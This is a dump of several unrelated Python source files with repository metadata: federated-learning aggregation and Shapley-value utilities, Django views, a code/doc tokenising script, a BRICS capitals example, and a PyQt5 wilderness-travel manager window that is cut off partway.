] | 7 | 2020-09-15T19:06:27.000Z | 2022-02-22T06:51:52.000Z | import copy
import torch
from torch import nn
from torch.utils.data import DataLoader
from torchtext.data import Batch
def averge_models(models, device=None):
    """Return a new model whose parameters are the element-wise mean of `models`.

    (Keeps the original, misspelled name for caller compatibility.)
    """
    final_model = copy.deepcopy(models[0])
    if device:
        models = [model.to(device) for model in models]
        final_model = final_model.to(device)
    # Bug fix: aggregate_gradient_updates requires the participant index set
    # R as its second argument; it was previously omitted, which raised a
    # TypeError at call time. Include every model in the average.
    averaged_parameters = aggregate_gradient_updates(
        [list(model.parameters()) for model in models],
        R=range(len(models)), mode='mean')
    for param, avg_param in zip(final_model.parameters(), averaged_parameters):
        param.data = avg_param.data
    return final_model
def compute_grad_update(old_model, new_model, device=None):
    """Return the per-parameter difference new_model - old_model as a list."""
    # maybe later to implement on selected layers/parameters
    if device:
        old_model, new_model = old_model.to(device), new_model.to(device)
    pairs = zip(old_model.parameters(), new_model.parameters())
    return [new_param.data - old_param.data for old_param, new_param in pairs]
def add_gradient_updates(grad_update_1, grad_update_2, weight=1.0):
    """In-place: grad_update_1 += weight * grad_update_2, parameter-wise."""
    assert len(grad_update_1) == len(grad_update_2), \
        "Lengths of the two grad_updates not equal"
    for target, source in zip(grad_update_1, grad_update_2):
        target.data += source.data * weight
def aggregate_gradient_updates(grad_updates, R, device=None, mode='sum', credits=None, shard_sizes=None):
    """Aggregate the updates of the participants whose index is in R.

    Args:
        grad_updates: list (one entry per participant) of per-parameter tensors
        R: collection of participant indices to include
        device: optional device to move tensors to before aggregating
        mode: 'mean' (FL-avg weighted by shard size), 'sum', or
            'credit-sum' (sum weighted by per-participant credits)
        credits / shard_sizes: per-participant weights; filtered by R
    Returns:
        list of aggregated per-parameter tensors, or None when grad_updates
        is empty.
    """
    if grad_updates:
        len_first = len(grad_updates[0])
        assert all(len(i) == len_first for i in grad_updates), "Different shapes of parameters. Cannot aggregate."
    else:
        return
    # Deep-copy so the callers' updates are never mutated; keep only R.
    grad_updates_ = [copy.deepcopy(grad_update) for i, grad_update in enumerate(grad_updates) if i in R]
    if device:
        for i, grad_update in enumerate(grad_updates_):
            grad_updates_[i] = [param.to(device) for param in grad_update]
    if credits is not None:
        credits = [credit for i, credit in enumerate(credits) if i in R]
    if shard_sizes is not None:
        shard_sizes = [shard_size for i, shard_size in enumerate(shard_sizes) if i in R]
    aggregated_gradient_updates = []
    if mode == 'mean':
        # default mean is FL-avg: weighted avg according to nk/n
        if shard_sizes is None:
            shard_sizes = torch.ones(len(grad_updates))
        for i, (grad_update, shard_size) in enumerate(zip(grad_updates_, shard_sizes)):
            grad_updates_[i] = [(shard_size * update) for update in grad_update]
        for i in range(len(grad_updates_[0])):
            aggregated_gradient_updates.append(torch.stack(
                [grad_update[i] for grad_update in grad_updates_]).mean(dim=0))
    elif mode == 'sum':
        for i in range(len(grad_updates_[0])):
            aggregated_gradient_updates.append(torch.stack(
                [grad_update[i] for grad_update in grad_updates_]).sum(dim=0))
    elif mode == 'credit-sum':
        # first changes the grad_updates altogether
        for i, (grad_update, credit) in enumerate(zip(grad_updates_, credits)):
            grad_updates_[i] = [(credit * update) for update in grad_update]
        # then compute the credit weight sum
        for i in range(len(grad_updates_[0])):
            aggregated_gradient_updates.append(torch.stack(
                [grad_update[i] for grad_update in grad_updates_]).sum(dim=0))
    return aggregated_gradient_updates
def add_update_to_model(model, update, weight=1.0, device=None):
    """In-place: add weight * update to the model's parameters; returns the model."""
    if not update:
        return model
    if device:
        model = model.to(device)
        update = [param.to(device) for param in update]
    for model_param, update_param in zip(model.parameters(), update):
        model_param.data += weight * update_param.data
    return model
def compare_models(model1, model2):
    """Return True iff both models hold identical parameter values."""
    return all(bool(p1.data.eq(p2.data).all())
               for p1, p2 in zip(model1.parameters(), model2.parameters()))
def flatten(grad_update):
    """Concatenate every parameter tensor in grad_update into one 1-D tensor."""
    views = [update.data.view(-1) for update in grad_update]
    return torch.cat(views)
def unflatten(flattened, normal_shape):
    """Inverse of flatten: slice `flattened` into tensors shaped like those
    in `normal_shape`."""
    grad_update = []
    offset = 0
    for param in normal_shape:
        n_params = param.numel()
        chunk = flattened[offset:offset + n_params]
        grad_update.append(torch.as_tensor(chunk).reshape(param.size()))
        offset += n_params
    return grad_update
def evaluate(model, eval_loader, device, loss_fn=None, verbose=True):
    """Compute accuracy (and loss) of `model` over eval_loader.

    Handles both torchtext Batch objects (text classification) and plain
    (data, target) tuples.

    NOTE(review): `loss` holds only the final batch's loss, not an average
    over the whole loader -- confirm that is intended before relying on it.
    """
    model.eval()
    model = model.to(device)
    correct = 0
    total = 0
    with torch.no_grad():
        for i, batch in enumerate(eval_loader):
            if isinstance(batch, Batch):
                batch_data, batch_target = batch.text, batch.label
                # batch_data.data.t_(), batch_target.data.sub_(1)  # batch first, index align
                batch_data = batch_data.permute(1, 0)
            else:
                batch_data, batch_target = batch[0], batch[1]
            batch_data, batch_target = batch_data.to(device), batch_target.to(device)
            outputs = model(batch_data)
            if loss_fn:
                loss = loss_fn(outputs, batch_target)
            else:
                loss = None
            # argmax over class scores, compared element-wise to the targets
            correct += (torch.max(outputs, 1)[1].view(batch_target.size()).data == batch_target.data).sum()
            total += len(batch_target)
        accuracy = correct.float() / total
        if verbose:
            print("Loss: {:.6f}. Accuracy: {:.4%}.".format(loss, accuracy))
    return loss, accuracy
'''
def one_on_one_evaluate(participants, federated_model, grad_updates, unfiltererd_grad_updates, eval_loader, device):
val_accs = []
for i, participant in enumerate(participants):
if participant.theta == 1:
model_to_eval = copy.deepcopy(participant.model)
add_update_to_model(model_to_eval, unfiltererd_grad_updates[i], device=device)
else:
model_to_eval = copy.deepcopy(federated_model)
add_update_to_model(model_to_eval, grad_updates[i], device=device)
_, val_acc = evaluate(model_to_eval, eval_loader, device, verbose=False)
del model_to_eval
val_accs.append(val_acc)
return val_accs
def leave_one_out_evaluate(federated_model, grad_updates, eval_loader, device):
loo_model = copy.deepcopy(federated_model)
loo_losses, loo_val_accs = [], []
for grad_update in grad_updates:
loo_model = add_update_to_model(loo_model, grad_update, weight = -1.0, device=device)
loss, val_acc = evaluate(loo_model, eval_loader, device, verbose=False)
loo_losses.append(loss)
loo_val_accs.append(val_acc)
loo_model = add_update_to_model(loo_model, grad_update, weight = 1.0, device=device)
# scalar - 1D torch tensor subtraction -> 1D torch tensor
# marginal_contributions = curr_val_acc - torch.tensor(loo_val_accs)
return loo_val_accs
'''
import numpy as np
# Fixed seed so random_split's unequal partitions are reproducible.
np.random.seed(1111)
def random_split(sample_indices, m_bins, equal=True):
    """Partition sample_indices into m_bins sub-arrays.

    Args:
        sample_indices: sequence of indices to split
        m_bins: number of partitions
        equal: if True, bins are (near-)equal sized; otherwise the split
            points are drawn uniformly at random.
    Returns:
        list of numpy arrays, one per bin.
    """
    sample_indices = np.asarray(sample_indices)
    if equal:
        indices_list = np.array_split(sample_indices, m_bins)
    else:
        # Bug fix: `n_samples` was previously undefined here (NameError);
        # it is the number of samples being split.
        n_samples = len(sample_indices)
        split_points = np.random.choice(
            n_samples - 2, m_bins - 1, replace=False) + 1
        split_points.sort()
        indices_list = np.split(sample_indices, split_points)
    return indices_list
import random
from itertools import permutations
def compute_shapley(grad_updates, federated_model, test_loader, device, Max_num_sequences=50):
    """Monte-Carlo estimate of each participant's Shapley value.

    Averages each participant's marginal test-accuracy contribution over up
    to Max_num_sequences random permutations of the participant ordering.
    Returns a tensor of length num_participants.
    """
    num_participants = len(grad_updates)
    all_sequences = list(permutations(range(num_participants)))
    if len(all_sequences) > Max_num_sequences:
        random.shuffle(all_sequences)
        all_sequences = all_sequences[:Max_num_sequences]
    # Baseline accuracy of the model before any update is applied.
    test_loss_prev, test_acc_prev = evaluate(federated_model, test_loader, device, verbose=False)
    prev_contribution = test_acc_prev.data
    marginal_contributions = torch.zeros((num_participants))
    for sequence in all_sequences:
        running_model = copy.deepcopy(federated_model)
        curr_contributions = []
        for participant_id in sequence:
            # Apply this participant's update on top of those already applied
            # in this permutation, and credit the accuracy delta.
            running_model = add_update_to_model(running_model, grad_updates[participant_id])
            test_loss, test_acc = evaluate(running_model, test_loader, device, verbose=False)
            contribution = test_acc.data
            if not curr_contributions:
                marginal_contributions[participant_id] += contribution - prev_contribution
            else:
                marginal_contributions[participant_id] += contribution - curr_contributions[-1]
            curr_contributions.append(contribution)
    return marginal_contributions / len(all_sequences)
3ae65789d9458479266b8a51662e5436d0fc02db | 525 | py | Python | TNP Cell Website/classroom/views/classroom.py | kaustubh240897/Quizapplication | dcdf05670da649b602f26013a95b89b5c3a1585a | [
"MIT"
] | 2 | 2018-11-04T06:44:58.000Z | 2018-11-15T19:19:19.000Z | TNP Cell Website/classroom/views/classroom.py | kaustubh240897/Quizapplication | dcdf05670da649b602f26013a95b89b5c3a1585a | [
"MIT"
] | 2 | 2018-10-29T15:27:16.000Z | 2018-10-30T08:38:37.000Z | TNP Cell Website/classroom/views/classroom.py | kaustubh240897/Training_and_Placement_cell_IIITV | dcdf05670da649b602f26013a95b89b5c3a1585a | [
"MIT"
] | 3 | 2018-10-29T15:00:44.000Z | 2020-10-14T13:05:10.000Z | from django.shortcuts import redirect, render
from django.views.generic import TemplateView
class SignUpView(TemplateView):
    """Static sign-up page rendered from registration/signup.html."""
    template_name = 'registration/signup.html'
#homePage
def home(request):
    """Route users to their role-specific landing page.

    Teachers go to their job list, students to the quiz list; anonymous
    visitors see the public home page.
    """
    if request.user.is_authenticated:
        if request.user.is_teacher:
            return redirect('teachers:my_jobs')
        else:
            return redirect('students:quiz_list')
    return render(request, 'classroom/SE_home.html')
#why_we
def why_we(request):
    """Render the static 'Why us' page."""
    return render(request, 'classroom/WHY_we.html')
| 25 | 52 | 0.72 |
3ae6ca75f3d3a8c0e269c42286630443d12eadfe | 102 | py | Python | fseval/pipelines/rank_and_validate/__init__.py | dunnkers/fseval | 49a11a63e09e65b1f14389b6ba3a9ae3aeae086d | [
"MIT"
] | 5 | 2020-07-08T11:58:46.000Z | 2022-01-26T13:58:00.000Z | fseval/pipelines/rank_and_validate/__init__.py | shenlong95/fseval | 4d2e6618b8838f9e52fe60621b08595dc4c5b4fb | [
"MIT"
] | 63 | 2021-05-09T06:18:24.000Z | 2022-03-27T18:05:58.000Z | fseval/pipelines/rank_and_validate/__init__.py | shenlong95/fseval | 4d2e6618b8838f9e52fe60621b08595dc4c5b4fb | [
"MIT"
] | 1 | 2022-02-11T03:24:14.000Z | 2022-02-11T03:24:14.000Z | from .rank_and_validate import BootstrappedRankAndValidate
__all__ = ["BootstrappedRankAndValidate"]
| 25.5 | 58 | 0.862745 |
3ae8972b7f0c8d8ea6d2f5706159829160fedc21 | 6,119 | py | Python | kolab/yk/yk.py | roy029/kolab | 10a3054da5e7c96c575de1336056eee65368c087 | [
"MIT"
] | null | null | null | kolab/yk/yk.py | roy029/kolab | 10a3054da5e7c96c575de1336056eee65368c087 | [
"MIT"
] | 1 | 2021-11-14T05:38:27.000Z | 2021-11-14T05:38:27.000Z | kolab/yk/yk.py | roy029/kolab | 10a3054da5e7c96c575de1336056eee65368c087 | [
"MIT"
] | 7 | 2020-11-02T13:05:44.000Z | 2022-01-09T11:06:04.000Z | from os import read
import sys
import pegtree as pg
import csv
from pegtree.optimizer import optimize
# Grammar and tokenising parser for the code/doc pairs.
peg = pg.grammar('yk.tpeg')
parse = pg.generate(peg)

# Placeholder alphabets: the n-th registered literal gets the n-th letter.
# VAR mixes upper/lower case; NAME is uppercase-only (repeated to double its
# length); VAL is lowercase-only (likewise repeated).
VAR_literal = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
NAME_literal = 'ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ'
VAL_literal = 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz'

# Command-line flags, mutated by the __main__ argument loop below.
OPTION = {
    '--notConv': False,
    '--diff': False,
    '--reverse': False,
}
def replace_as_special_parameter(s, mapped, tag=None):  # mapped => {'df': '<A>'}
    """Return the placeholder token for `s`, registering a new one if unseen.

    The alphabet depends on `tag`: 'Name' -> NAME_literal, 'Value' ->
    VAL_literal, anything else -> VAR_literal. New placeholders take the
    letter at position len(mapped) so successive literals get successive
    letters.
    """
    if s in mapped:
        return mapped[s]
    if tag == 'Name':
        alphabet = NAME_literal
    elif tag == 'Value':
        alphabet = VAL_literal
    else:
        alphabet = VAR_literal
    placeholder = '<' + alphabet[len(mapped)] + '>'
    mapped[s] = placeholder
    return placeholder
def convert_nothing(tok, doc, mapped, diff):
    """Stringify a token without placeholder substitution; only ';' becomes '<sep>'."""
    text = str(tok)
    return '<sep>' if text == ';' else text
def convert_all(tok, doc, mapped, diff):
    """Replace Name/Value tokens that also appear in the doc with placeholders.

    When `diff` is True, Name and Value tokens draw placeholders from
    separate alphabets (NAME_literal / VAL_literal); otherwise both share
    VAR_literal. Everything else falls through to convert_nothing.
    """
    tag = tok.getTag()
    s = str(tok)
    # print('@@', s, tag)
    # Dedup: the original diff/non-diff branches were identical except for
    # the `tag` forwarded to replace_as_special_parameter (tag=None selects
    # the shared VAR_literal alphabet).
    name_tag = 'Name' if diff else None
    value_tag = 'Value' if diff else None
    if tag == 'Name':
        if s in doc:
            return replace_as_special_parameter(s, mapped, tag=name_tag)
        if s.startswith('.'):
            # Detach a leading attribute dot so it tokenises separately.
            s = '. ' + s[1:]
        return s
    if tag == 'Value':
        if s in doc:
            return replace_as_special_parameter(s, mapped, tag=value_tag)
        # Try the literal re-quoted with single then double quotes.
        for quoted in (f"'{s[1:-1]}'", f'"{s[1:-1]}"'):
            if quoted in doc:
                return replace_as_special_parameter(quoted, mapped, tag=value_tag)
    return convert_nothing(tok, doc, mapped, diff)
def make(code, doc0, convert=convert_all, diff=False, reverse=False):
    """Tokenise a (code, doc) pair and substitute shared literals.

    Names/values that appear in both the code and the doc are replaced by
    placeholder tokens (<A>, <a>, ...) on both sides. With reverse=True the
    placeholder letters are re-assigned in reverse order of first use.
    Returns the transformed (code, doc) pair as space-joined strings.
    """
    # print('BEFORE', code, doc)
    mapped = {}
    doc = []
    flag = 0
    for tok in parse(doc0):
        s = str(tok)
        # TODO: clarify the purpose of this branch and of `flag`
        # (set when a raw doc token matches a quoted code literal, never read).
        if tok.getTag() == 'Raw':
            # If a raw doc token appears quoted in the code, keep the quoted
            # form so it matches the code-side Value token later.
            q = f"'{s}'"
            q2 = f'"{s}"'
            if q in code:
                #print(f'`{s}` => {q}')
                doc.append(q)
                flag = 1
                continue
            if q2 in code:
                #print(f'`{s}` => {q2}')
                doc.append(q2)
                flag = 1
                continue
        doc.append(s)
    # Convert the code side, filling `mapped` with literal -> placeholder.
    ws = [convert(tok, doc, mapped, diff) for tok in parse(code)]
    # print('@@ws', ws)
    code = ' '.join(ws)
    if reverse:
        # Re-letter the placeholders so the last-registered literal gets the
        # first letter of its alphabet, then rebuild the code string.
        reverse_stoken = {}
        if convert == convert_all:
            if diff:
                cnt = 1
                for k, v in mapped.items():
                    # v[1] is the placeholder letter; uppercase means the
                    # NAME alphabet, otherwise the VAL alphabet.
                    if v[1] in NAME_literal:
                        s_token = '<' + NAME_literal[len(mapped) - cnt] + '>'
                    else:
                        s_token = '<' + VAL_literal[len(mapped) - cnt] + '>'
                    mapped[k] = s_token
                    reverse_stoken[v] = s_token
                    cnt += 1
            else:
                cnt = 1
                for k, v in mapped.items():
                    s_token = '<' + VAR_literal[len(mapped) - cnt] + '>'
                    mapped[k] = s_token
                    reverse_stoken[v] = s_token
                    cnt += 1
        # print('@@rd', reverse_stoken)
        ws_rev = [reverse_stoken[tok] if tok in reverse_stoken else tok for tok in ws]
        code = ' '.join(ws_rev)
    # print('@@mp', mapped)
    # Apply the same placeholder mapping to the doc side.
    ws = [mapped[tok] if tok in mapped else tok for tok in doc if tok.strip() != '']
    doc = ' '.join(ws)
    return code, doc
def read_tsv(input_filename, output_filename=None):
    """Convert every (code, doc) row of a TSV file and emit the results.

    Args:
        input_filename: path to a tab-separated file whose rows are
            ``(code, doc)`` pairs.
        output_filename: despite the name, this is a writable file-like
            object (callers pass ``sys.stdout``) handed to ``csv.writer``;
            when ``None`` the converted pairs are printed with ``print()``.
            NOTE(review): an actual filename string would fail at
            ``writerow`` — confirm intent before renaming the parameter.

    Conversion is steered by the global ``OPTION`` flags (``--notConv``,
    ``--diff``, ``--reverse``); when ``--reverse`` is set a second,
    reverse-numbered conversion is emitted whenever it differs from the
    forward one.
    """
    with open(input_filename) as f:
        reader = csv.reader(f, delimiter='\t')
        # Create the writer once, up front; `is not None` instead of `!= None`.
        writer = csv.writer(output_filename, delimiter='\t') if output_filename is not None else None
        for row in reader:
            code2 = None  # secondary (reverse) conversion, if any
            if OPTION['--notConv']:
                code, doc = make(row[0], row[1], convert=convert_nothing)
            elif OPTION['--diff'] and OPTION['--reverse']:
                code, doc = make(row[0], row[1], diff=True, reverse=False)
                code2, doc2 = make(row[0], row[1], diff=True, reverse=True)
            elif OPTION['--diff']:
                code, doc = make(row[0], row[1], diff=True, reverse=False)
            elif OPTION['--reverse']:
                code, doc = make(row[0], row[1], diff=False, reverse=False)
                code2, doc2 = make(row[0], row[1], diff=False, reverse=True)
            else:
                code, doc = make(row[0], row[1])
            if writer is None:
                print(code, doc)
                # Only emit the reverse variant when it actually differs.
                if code2 is not None and code2 != code:
                    print(code2, doc2)
            else:
                writer.writerow([code, doc])
                if code2 is not None and code2 != code:
                    writer.writerow([code2, doc2])
if __name__ == '__main__':
    # CLI: arguments starting with '-' set OPTION flags ('-x' or '-x=value');
    # every other argument is treated as a TSV file to convert.
    if len(sys.argv) > 1:
        for filename in sys.argv[1:]:
            if filename.startswith('-'):
                # A bare flag like '--diff' is shorthand for '--diff=True'.
                if '=' not in filename:
                    filename += '=True'
                # split('=', 1): keep values that themselves contain '='.
                key, value = filename.split('=', 1)
                OPTION[key] = int(value) if value.isdigit() else value == 'True'
                continue
            try:
                read_tsv(filename, sys.stdout)
            except Exception:
                # Fall back to plain printing if csv output fails; narrowed
                # from a bare `except:` so KeyboardInterrupt/SystemExit
                # still propagate.
                read_tsv(filename)
| 32.897849 | 86 | 0.484393 |
3ae9c27cb433dee341880c12a91958034dceafbb | 270 | py | Python | Task2/02_list-dicts.py | telecomprofi/Cisco-DevOps-MDP-02 | f44173d468319a90dc6b7c5ea92cd6b8b3762b45 | [
"Apache-2.0"
] | null | null | null | Task2/02_list-dicts.py | telecomprofi/Cisco-DevOps-MDP-02 | f44173d468319a90dc6b7c5ea92cd6b8b3762b45 | [
"Apache-2.0"
] | null | null | null | Task2/02_list-dicts.py | telecomprofi/Cisco-DevOps-MDP-02 | f44173d468319a90dc6b7c5ea92cd6b8b3762b45 | [
"Apache-2.0"
# BRICS member states and their capital cities; South Africa has three.
country = ["Brazil", "Russia", "India", "China", "South Africa"]
capital_values = ["Brasilia", "Moscow", "New Delhi", "Beijing",
                  ["Pretoria", "Cape Town", "Bloemfontein"]]
capitals = dict(zip(country, capital_values))
print(country)
print(capitals)
print(capitals["South Africa"][1])
| 33.75 | 74 | 0.696296 |
3aea02ea9b227434bbb8b250a3ff42f885040255 | 17,501 | py | Python | Interface/Windows/WildernessTravelManagerWindow.py | Snackhole/SerpentRPG | 9e5ae019893592a46dd7681daba56af8e8e29744 | [
"MIT"
] | 1 | 2021-02-27T16:33:53.000Z | 2021-02-27T16:33:53.000Z | Interface/Windows/WildernessTravelManagerWindow.py | Snackhole/SerpentRPG | 9e5ae019893592a46dd7681daba56af8e8e29744 | [
"MIT"
] | null | null | null | Interface/Windows/WildernessTravelManagerWindow.py | Snackhole/SerpentRPG | 9e5ae019893592a46dd7681daba56af8e8e29744 | [
"MIT"
] | null | null | null | import math
import os
from PyQt5 import QtCore
from PyQt5.QtWidgets import QGridLayout, QLabel, QPushButton, QFrame, QTextEdit, QInputDialog, QSizePolicy, QAction, QMessageBox
from Core.DieClock import DieClock
from Core.WildernessTravelManager import WildernessTravelManager
from Interface.Widgets.LineEditMouseWheelExtension import LineEditMouseWheelExtension
from Interface.Windows.Window import Window
from SaveAndLoad.SaveAndOpenMixin import SaveAndOpenMixin
class WildernessTravelManagerWindow(Window, SaveAndOpenMixin):
    """Main window for tracking wilderness travel in the Serpent RPG.

    Combines a travel-action panel (Move/Forage/Spend Days), a wilderness
    clock (current value / maximum / complication threshold) and a log view.
    All game state lives in ``self.WildernessTravelManager``; this class only
    wires Qt widgets to it and refreshes the display.

    NOTE(review): ``Window`` and ``SaveAndOpenMixin`` are project classes not
    visible here; ``CreateInterface`` is presumably invoked by the ``Window``
    base during ``super().__init__`` — confirm against Window's source.
    """

    def __init__(self, ScriptName, AbsoluteDirectoryPath):
        """Build the window and its backing WildernessTravelManager.

        Args:
            ScriptName: application name used in the window title.
            AbsoluteDirectoryPath: base directory used by SaveAndOpenMixin.
        """
        # Store Absolute Directory Path for SaveAndOpenMixin
        self.AbsoluteDirectoryPath = AbsoluteDirectoryPath

        # Initialize
        super().__init__(ScriptName, AbsoluteDirectoryPath)

        # Create Wilderness Travel Manager
        self.WildernessTravelManager = WildernessTravelManager()

        # Set Up Save and Open
        # ".wildtrvl" is the save-file extension; the tuple lists the classes
        # the (de)serializer must know how to reconstruct.
        self.SetUpSaveAndOpen(".wildtrvl", "Wilderness Travel Manager", (WildernessTravelManager, DieClock))

        # Update Display
        self.UpdateDisplay()

    def CreateInterface(self):
        """Create all widgets, lay them out, and build the menu bar."""
        # Styles
        self.LabelStyle = "QLabel {font-size: 20pt;}"
        self.LineEditStyle = "QLineEdit {font-size: 20pt;}"
        # Yellow/red variants are defined for threshold warnings but not
        # applied anywhere in this class.
        self.LineEditStyleYellow = "QLineEdit {font-size: 20pt; color: goldenrod;}"
        self.LineEditStyleRed = "QLineEdit {font-size: 20pt; color: red;}"
        self.PoolAndClockButtonStyle = "QPushButton {font-size: 20pt;}"

        # Button and Line Edit Size Policy
        self.ButtonAndLineEditSizePolicy = QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)

        # Pool and Clock Width (fixed pixel width of the clock line edits)
        self.PoolAndClockWidth = 160

        # Travel Actions Label
        self.TravelActionsLabel = QLabel("Travel Actions")
        self.TravelActionsLabel.setStyleSheet(self.LabelStyle)
        self.TravelActionsLabel.setAlignment(QtCore.Qt.AlignCenter)

        # Travel Action Buttons
        self.MoveButton = QPushButton("Move")
        self.MoveButton.clicked.connect(self.Move)
        self.MoveButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
        self.ForageButton = QPushButton("Forage")
        self.ForageButton.clicked.connect(self.Forage)
        self.ForageButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
        self.SpendDaysButton = QPushButton("Spend Days")
        self.SpendDaysButton.clicked.connect(self.SpendDays)
        self.SpendDaysButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)

        # Wilderness Clock Label
        self.WildernessClockLabel = QLabel("Wilderness Clock")
        self.WildernessClockLabel.setStyleSheet(self.LabelStyle)
        self.WildernessClockLabel.setAlignment(QtCore.Qt.AlignCenter)

        # Wilderness Clock Current Value Line Edit
        # Read-only display; the mouse wheel adjusts the value by +/-1.
        self.WildernessClockCurrentValueLineEdit = LineEditMouseWheelExtension(lambda event: self.ModifyWildernessClockCurrentValue(1 if event.angleDelta().y() > 0 else -1))
        self.WildernessClockCurrentValueLineEdit.setReadOnly(True)
        self.WildernessClockCurrentValueLineEdit.setAlignment(QtCore.Qt.AlignCenter)
        self.WildernessClockCurrentValueLineEdit.setStyleSheet(self.LineEditStyle)
        self.WildernessClockCurrentValueLineEdit.setSizePolicy(self.ButtonAndLineEditSizePolicy)
        self.WildernessClockCurrentValueLineEdit.setFixedWidth(self.PoolAndClockWidth)

        # Wilderness Clock Current Value Buttons
        self.WildernessClockCurrentValueIncreaseButton = QPushButton("+")
        self.WildernessClockCurrentValueIncreaseButton.clicked.connect(lambda: self.ModifyWildernessClockCurrentValue(1))
        self.WildernessClockCurrentValueIncreaseButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
        self.WildernessClockCurrentValueIncreaseButton.setStyleSheet(self.PoolAndClockButtonStyle)
        self.WildernessClockCurrentValueDecreaseButton = QPushButton("-")
        self.WildernessClockCurrentValueDecreaseButton.clicked.connect(lambda: self.ModifyWildernessClockCurrentValue(-1))
        self.WildernessClockCurrentValueDecreaseButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
        self.WildernessClockCurrentValueDecreaseButton.setStyleSheet(self.PoolAndClockButtonStyle)

        # Wilderness Clock Divider Label ("current / maximum")
        self.WildernessClockDividerLabel = QLabel("/")
        self.WildernessClockDividerLabel.setStyleSheet(self.LabelStyle)
        self.WildernessClockDividerLabel.setAlignment(QtCore.Qt.AlignCenter)

        # Wilderness Clock Maximum Value Line Edit
        self.WildernessClockMaximumValueLineEdit = LineEditMouseWheelExtension(lambda event: self.ModifyWildernessClockMaximumValue(1 if event.angleDelta().y() > 0 else -1))
        self.WildernessClockMaximumValueLineEdit.setReadOnly(True)
        self.WildernessClockMaximumValueLineEdit.setAlignment(QtCore.Qt.AlignCenter)
        self.WildernessClockMaximumValueLineEdit.setStyleSheet(self.LineEditStyle)
        self.WildernessClockMaximumValueLineEdit.setSizePolicy(self.ButtonAndLineEditSizePolicy)
        self.WildernessClockMaximumValueLineEdit.setFixedWidth(self.PoolAndClockWidth)

        # Wilderness Clock Maximum Value Buttons
        self.WildernessClockMaximumValueIncreaseButton = QPushButton("+")
        self.WildernessClockMaximumValueIncreaseButton.clicked.connect(lambda: self.ModifyWildernessClockMaximumValue(1))
        self.WildernessClockMaximumValueIncreaseButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
        self.WildernessClockMaximumValueIncreaseButton.setStyleSheet(self.PoolAndClockButtonStyle)
        self.WildernessClockMaximumValueDecreaseButton = QPushButton("-")
        self.WildernessClockMaximumValueDecreaseButton.clicked.connect(lambda: self.ModifyWildernessClockMaximumValue(-1))
        self.WildernessClockMaximumValueDecreaseButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
        self.WildernessClockMaximumValueDecreaseButton.setStyleSheet(self.PoolAndClockButtonStyle)

        # Wilderness Clock Threshold Label
        self.WildernessClockThresholdLabel = QLabel("Threshold")
        self.WildernessClockThresholdLabel.setAlignment(QtCore.Qt.AlignCenter)

        # Wilderness Clock Threshold Line Edit
        self.WildernessClockThresholdLineEdit = LineEditMouseWheelExtension(lambda event: self.ModifyWildernessClockThreshold(1 if event.angleDelta().y() > 0 else -1))
        self.WildernessClockThresholdLineEdit.setReadOnly(True)
        self.WildernessClockThresholdLineEdit.setAlignment(QtCore.Qt.AlignCenter)
        self.WildernessClockThresholdLineEdit.setStyleSheet(self.LineEditStyle)
        self.WildernessClockThresholdLineEdit.setSizePolicy(self.ButtonAndLineEditSizePolicy)
        self.WildernessClockThresholdLineEdit.setFixedWidth(self.PoolAndClockWidth)

        # Wilderness Clock Threshold Buttons
        self.WildernessClockThresholdIncreaseButton = QPushButton("+")
        self.WildernessClockThresholdIncreaseButton.clicked.connect(lambda: self.ModifyWildernessClockThreshold(1))
        self.WildernessClockThresholdIncreaseButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
        self.WildernessClockThresholdIncreaseButton.setStyleSheet(self.PoolAndClockButtonStyle)
        self.WildernessClockThresholdDecreaseButton = QPushButton("-")
        self.WildernessClockThresholdDecreaseButton.clicked.connect(lambda: self.ModifyWildernessClockThreshold(-1))
        self.WildernessClockThresholdDecreaseButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
        self.WildernessClockThresholdDecreaseButton.setStyleSheet(self.PoolAndClockButtonStyle)

        # Wilderness Log Label
        self.WildernessLogLabel = QLabel("Wilderness Log")
        self.WildernessLogLabel.setStyleSheet(self.LabelStyle)
        self.WildernessLogLabel.setAlignment(QtCore.Qt.AlignCenter)

        # Wilderness Log Text Edit (display-only; entries added via menu/actions)
        self.WildernessLogTextEdit = QTextEdit()
        self.WildernessLogTextEdit.setReadOnly(True)

        # Create Layout (three columns: actions | clock | log)
        self.Layout = QGridLayout()

        # Travel Action Widgets in Layout
        self.TravelActionsFrame = QFrame()
        self.TravelActionsFrame.setFrameStyle(QFrame.Panel | QFrame.Plain)
        self.TravelActionsLayout = QGridLayout()
        self.TravelActionsLayout.addWidget(self.TravelActionsLabel, 0, 0)
        self.TravelActionsLayout.addWidget(self.MoveButton, 1, 0)
        self.TravelActionsLayout.addWidget(self.ForageButton, 2, 0)
        self.TravelActionsLayout.addWidget(self.SpendDaysButton, 3, 0)
        # Stretch the button rows equally (row 0 is the label).
        for Row in range(1, 4):
            self.TravelActionsLayout.setRowStretch(Row, 1)
        self.TravelActionsFrame.setLayout(self.TravelActionsLayout)
        self.Layout.addWidget(self.TravelActionsFrame, 0, 0)

        # Add Wilderness Clock Widgets to Layout
        self.WildernessClockFrame = QFrame()
        self.WildernessClockFrame.setFrameStyle(QFrame.Panel | QFrame.Plain)
        self.WildernessClockLayout = QGridLayout()
        self.WildernessClockLayout.addWidget(self.WildernessClockLabel, 0, 0, 1, 3)
        self.WildernessClockLayout.addWidget(self.WildernessClockCurrentValueIncreaseButton, 1, 0)
        self.WildernessClockLayout.addWidget(self.WildernessClockCurrentValueLineEdit, 2, 0)
        self.WildernessClockLayout.addWidget(self.WildernessClockCurrentValueDecreaseButton, 3, 0)
        self.WildernessClockLayout.addWidget(self.WildernessClockDividerLabel, 2, 1)
        self.WildernessClockLayout.addWidget(self.WildernessClockMaximumValueIncreaseButton, 1, 2)
        self.WildernessClockLayout.addWidget(self.WildernessClockMaximumValueLineEdit, 2, 2)
